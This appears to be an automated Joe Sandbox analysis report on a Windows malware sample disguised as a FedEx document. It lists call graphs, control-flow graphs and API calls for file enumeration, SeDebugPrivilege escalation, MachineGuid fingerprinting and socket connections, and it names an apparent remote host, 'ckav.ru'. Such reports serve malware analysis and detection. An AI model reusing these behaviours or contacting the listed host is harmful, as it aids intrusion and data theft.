405872 4 API calls 10148->10149 10149->10138 10151 40f064 10150->10151 10152 402b7c 2 API calls 10151->10152 10154 40f072 10152->10154 10153 40efca 10153->10141 10154->10153 10156 405ecd 10154->10156 10157 4059b8 4 API calls 10156->10157 10158 405edf 10157->10158 10158->10154 9508 410c98 9509 41219c 14 API calls 9508->9509 9510 410ca8 9509->9510 9511 41219c 14 API calls 9510->9511 9512 410cb5 9511->9512 9513 412093 20 API calls 9512->9513 9514 410cc9 9513->9514 10228 41249c 10229 4056bf 2 API calls 10228->10229 10230 4124aa 10229->10230 10231 4057df 13 API calls 10230->10231 10236 4124ce 10230->10236 10232 4124be 10231->10232 10233 413aca 4 API calls 10232->10233 10234 4124c8 10233->10234 10235 405695 2 API calls 10234->10235 10235->10236 9518 40f49e 9519 40f4b6 13 API calls 9518->9519 9520 40f4a8 9519->9520 9521 40929e 9522 413b28 6 API calls 9521->9522 9523 4092a4 9522->9523 9524 405b6f 6 API calls 9523->9524 9525 4092af 9524->9525 9526 4092c5 9525->9526 9527 409408 15 API calls 9525->9527 9528 4092bf 9527->9528 9529 402bab 2 API calls 9528->9529 9529->9526 10255 407fa4 10256 407fb7 10255->10256 10257 402b7c 2 API calls 10256->10257 10259 407fee 10256->10259 10258 40800d 10257->10258 10258->10259 10260 4037be 4 API calls 10258->10260 10261 40803c 10260->10261 10262 402bab 2 API calls 10261->10262 10262->10259 9566 4090aa 9567 404b22 6 API calls 9566->9567 9568 4090c1 9567->9568 9569 4090d8 9568->9569 9570 409408 15 API calls 9568->9570 9571 404b22 6 API calls 9569->9571 9572 4090d2 9570->9572 9573 4090eb 9571->9573 9574 402bab 2 API calls 9572->9574 9575 408c4d 15 API calls 9573->9575 9578 409104 9573->9578 9574->9569 9576 4090fe 9575->9576 9577 402bab 2 API calls 9576->9577 9577->9578 9585 409cae 9600 404b79 9585->9600 9587 409cc5 9588 409d27 9587->9588 9590 405b6f 6 API calls 9587->9590 9591 409d2f 9587->9591 9589 402bab 2 API calls 9588->9589 9589->9591 9592 409cec 9590->9592 9592->9588 9593 404b79 6 API calls 9592->9593 9594 409d05 9593->9594 9595 409d1e 9594->9595 9596 408c4d 15 API calls 9594->9596 9597 402bab 2 API calls 9595->9597 9598 409d18 9596->9598 9597->9588 9599 402bab 2 API calls 9598->9599 9599->9595 9601 404b22 6 API calls 9600->9601 9602 404b8a 9601->9602 9602->9587 10322 411fb3 10323 405b6f 6 API calls 10322->10323 10325 412013 10323->10325 10324 412075 10325->10324 10340 41206a 10325->10340 10341 411a8d 10325->10341 10327 402bab 2 API calls 10327->10324 10329 4056bf 2 API calls 10330 41203d 10329->10330 10331 405872 4 API calls 10330->10331 10332 41204a 10331->10332 10333 413aca 4 API calls 10332->10333 10334 412054 10333->10334 10335 405695 2 API calls 10334->10335 10336 41205a 10335->10336 10337 413a58 13 API calls 10336->10337 10338 412064 10337->10338 10339 402bab 2 API calls 10338->10339 10339->10340 10340->10327 10342 402b7c 2 API calls 10341->10342 10343 411aa3 10342->10343 10351 411f05 10343->10351 10364 404ada 10343->10364 10346 404ada 4 API calls 10347 411cad 10346->10347 10348 411f0c 10347->10348 10349 411cc0 10347->10349 10350 402bab 2 API calls 10348->10350 10367 405eb6 10349->10367 10350->10351 10351->10329 10351->10340 10353 411d3c 10354 4031e5 4 API calls 10353->10354 10362 411d7b 10354->10362 10355 411ea6 10356 4031e5 4 API calls 10355->10356 10357 411eb5 10356->10357 10358 4031e5 4 API calls 10357->10358 10359 411ed6 10358->10359 10360 405eb6 4 API calls 10359->10360 10360->10351 10361 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10361->10362 10362->10355 10362->10361 10363 405eb6 4 API calls 10362->10363 10363->10362 10365 4031e5 4 API calls 10364->10365 10366 404afd 10365->10366 10366->10346 10368 405998 4 API calls 10367->10368 10369 405ec8 10368->10369 10369->10353 9632 40f6b8 9633 41219c 14 API calls 9632->9633 9634 40f6c7 9633->9634 9635 41219c 14 API calls 9634->9635 9636 40f6d5 9635->9636 9637 41219c 14 API calls 9636->9637 9638 40f6df 9637->9638 9657 40d6bd 9658 4056bf 2 API calls 9657->9658 9659 40d6c9 9658->9659 9670 404cbf 9659->9670 9662 404cbf 8 API calls 9663 40d6f4 9662->9663 9664 404cbf 8 API calls 9663->9664 9665 40d702 9664->9665 9666 413aca 4 API calls 9665->9666 9667 40d711 9666->9667 9668 405695 2 API calls 9667->9668 9669 40d71f 9668->9669 9671 402b7c 2 API calls 9670->9671 9672 404ccd 9671->9672 9673 404ddc 9672->9673 9674 404b8f 5 API calls 9672->9674 9673->9662 9675 404ce4 9674->9675 9676 404dd4 9675->9676 9678 402b7c 2 API calls 9675->9678 9677 402bab 2 API calls 9676->9677 9677->9673 9679 404d04 9678->9679 9680 404dcc 9679->9680 9682 404dc6 9679->9682 9683 402b7c 2 API calls 9679->9683 9685 404b8f 5 API calls 9679->9685 9686 402bab GetProcessHeap HeapFree 9679->9686 9687 404a39 5 API calls 9679->9687 9688 405b6f 6 API calls 9679->9688 9689 404cbf 8 API calls 9679->9689 9681 404a39 5 API calls 9680->9681 9681->9676 9684 402bab 2 API calls 9682->9684 9683->9679 9684->9680 9685->9679 9686->9679 9687->9679 9688->9679 9689->9679 9690 40f0bf 9691 4056bf 2 API calls 9690->9691 9692 40f0c9 9691->9692 9693 40f115 9692->9693 9695 404cbf 8 API calls 9692->9695 9694 41219c 14 API calls 9693->9694 9696 40f128 9694->9696 9697 40f0ed 9695->9697 9698 404cbf 8 API calls 9697->9698 9699 40f0fb 9698->9699 9700 413aca 4 API calls 9699->9700 9701 40f10a 9700->9701 9702 405695 2 API calls 9701->9702 9702->9693

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 161 403dd1-403dd8 151->161 162 403e9d-403ea4 call 402bab 151->162 154 403f97-403f9d 152->154 159 403ee8-403ef8 call 405d24 153->159 160 403f8e-403f94 call 402bab 153->160 176 403f03-403f0a 159->176 177 403efa-403f01 159->177 160->152 166 403e75-403e90 call 4031e5 FindNextFileW 161->166 167 403dde-403de2 161->167 162->150 166->161 180 403e96-403e97 call 403bef 166->180 172 403e12-403e22 call 405d24 167->172 173 403de4-403df9 call 405eff 167->173 189 403e30-403e4c call 405b6f 172->189 190 403e24-403e2e 172->190 173->166 186 403dfb-403e10 call 405eff 173->186 182 403f12-403f2d call 405b6f 176->182 183 403f0c-403f10 176->183 177->176 181 403f41-403f5c call 4031e5 FindNextFileW 177->181 193 403e9c 180->193 196 403f87-403f88 call 403bef 181->196 197 403f5e-403f61 181->197 182->181 199 403f2f-403f33 182->199 183->181 183->182 186->166 186->172 189->166 203 403e4e-403e6f call 403d74 call 402bab 189->203 190->166 190->189 193->162 205 403f8d 196->205 197->159 201 403f75-403f85 call 402bab call 403bef 199->201 202 403f35-403f36 call 40fa23 199->202 201->154 209 403f39-403f40 call 402bab 202->209 203->166 217 403f63-403f73 call 402bab call 403bef 203->217 205->160 209->181 217->154
                  APIs
                  • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                  • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                  • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                  • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileFind$FirstNext
                  • String ID: %s\%s$%s\*$Program Files$Windows
                  • API String ID: 1690352074-2009209621
                  • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                  • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                  • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                  • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                  APIs
                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                  • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                  • String ID: SeDebugPrivilege
                  • API String ID: 3615134276-2896544425
                  • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                  • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                  • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                  • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                  • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcess
                  • String ID:
                  • API String ID: 1357844191-0
                  • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                  • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                  • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                  • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                  APIs
                  • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: recv
                  • String ID:
                  • API String ID: 1507349165-0
                  • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                  • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                  • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                  • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 231 406201-406203 229->231 232 406208-406228 call 4060ac call 4031e5 229->232 237 40624c-406258 call 402b7c 230->237 238 40623d-406249 call 40338c 230->238 235 406329-40632e 231->235 232->230 232->231 246 406269-406290 call 4031e5 GetTokenInformation 237->246 247 40625a-406266 call 40338c 237->247 238->237 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 262 4062a2-4062b9 call 406086 253->262 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 263 40630c 256->263 259 406311-406317 call 402bab 257->259 260 406318-40631e 257->260 259->260 265 406320-406326 call 402bab 260->265 266 406327 260->266 272 4062f5-4062fd call 402bab 262->272 273 4062bb-4062e4 call 4031e5 262->273 263->257 265->266 266->235 272->254 273->272 279 4062e6-4062ec call 405b6f 273->279 281 4062f1-4062f3 279->281 281->272
                  APIs
                  • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                  • _wmemset.LIBCMT ref: 00406244
                  • _wmemset.LIBCMT ref: 00406261
                  • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: _wmemset$ErrorInformationLastToken
                  • String ID: IDA$IDA
                  • API String ID: 487585393-2020647798
                  • Opcode ID: a5e5aa255662804c4e67c84550f50b624ac64f77e5461781f5e6cba767b6fa0d
                  • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                  • Opcode Fuzzy Hash: a5e5aa255662804c4e67c84550f50b624ac64f77e5461781f5e6cba767b6fa0d
                  • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 553 404ec7-404ec9 542->553 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 547 404ec0-404ec6 call 402bab 545->547 548 404ecb 545->548 546->545 547->553 552 404ecd-404ece 548->552 552->539 553->552
                  APIs
                  • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                  • socket.WS2_32(?,?,?), ref: 00404E7A
                  • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: freeaddrinfogetaddrinfosocket
                  • String ID:
                  • API String ID: 2479546573-0
                  • Opcode ID: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
                  • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                  • Opcode Fuzzy Hash: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
                  • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 571 404113-404119 559->571 572 40417a 559->572 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 568 4041a9-4041b8 call 403c59 562->568 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 568->576 577 4041db-4041e4 call 402bab 568->577 571->572 575 40411b-404120 571->575 574 40417d-40417e call 403c40 572->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->572 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                  APIs
                  • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                  • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$AllocCreateReadVirtual
                  • String ID: .tmp
                  • API String ID: 3585551309-2986845003
                  • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                  • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                  • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                  • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                  APIs
                  • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                  • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                  • GetLastError.KERNEL32 ref: 0041399E
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: Error$CreateLastModeMutex
                  • String ID:
                  • API String ID: 3448925889-0
                  • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                  • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                  • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                  • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                  APIs
                  • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                  • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CreatePointerWrite
                  • String ID:
                  • API String ID: 3672724799-0
                  • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                  • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                  • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                  • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                  APIs
                  • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                    • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                    • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                    • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$CreateFreeProcessThread_wmemset
                  • String ID: ckav.ru
                  • API String ID: 2915393847-2696028687
                  • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                  • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                  • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                  • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                  APIs
                    • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                    • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                  • _wmemset.LIBCMT ref: 0040634F
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcess_wmemset
                  • String ID: CA
                  • API String ID: 2773065342-1052703068
                  • Opcode ID: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
                  • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                  • Opcode Fuzzy Hash: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
                  • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                  APIs
                  • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: InformationToken
                  • String ID: IDA
                  • API String ID: 4114910276-365204570
                  • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                  • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                  • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                  • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                  APIs
                  • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc
                  • String ID: s1@
                  • API String ID: 190572456-427247929
                  • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                  • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                  • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                  • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                  APIs
                    • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                    • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                  • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                  • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateOpenProcessQueryValue
                  • String ID:
                  • API String ID: 1425999871-0
                  • Opcode ID: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
                  • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                  • Opcode Fuzzy Hash: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
                  • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                  APIs
                  • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: CheckMembershipToken
                  • String ID:
                  • API String ID: 1351025785-0
                  • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                  • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                  • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                  • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                  APIs
                  • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateDirectory
                  • String ID:
                  • API String ID: 4241100979-0
                  • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                  • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                  • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                  • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                  APIs
                  • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                  Memory Dump Source
                  • Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd
                  Yara matches
                  Similarity
                  • API ID: InfoNativeSystem
                  • String ID:
                  • API String ID: 1721193555-0
                  • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                  • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                  • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
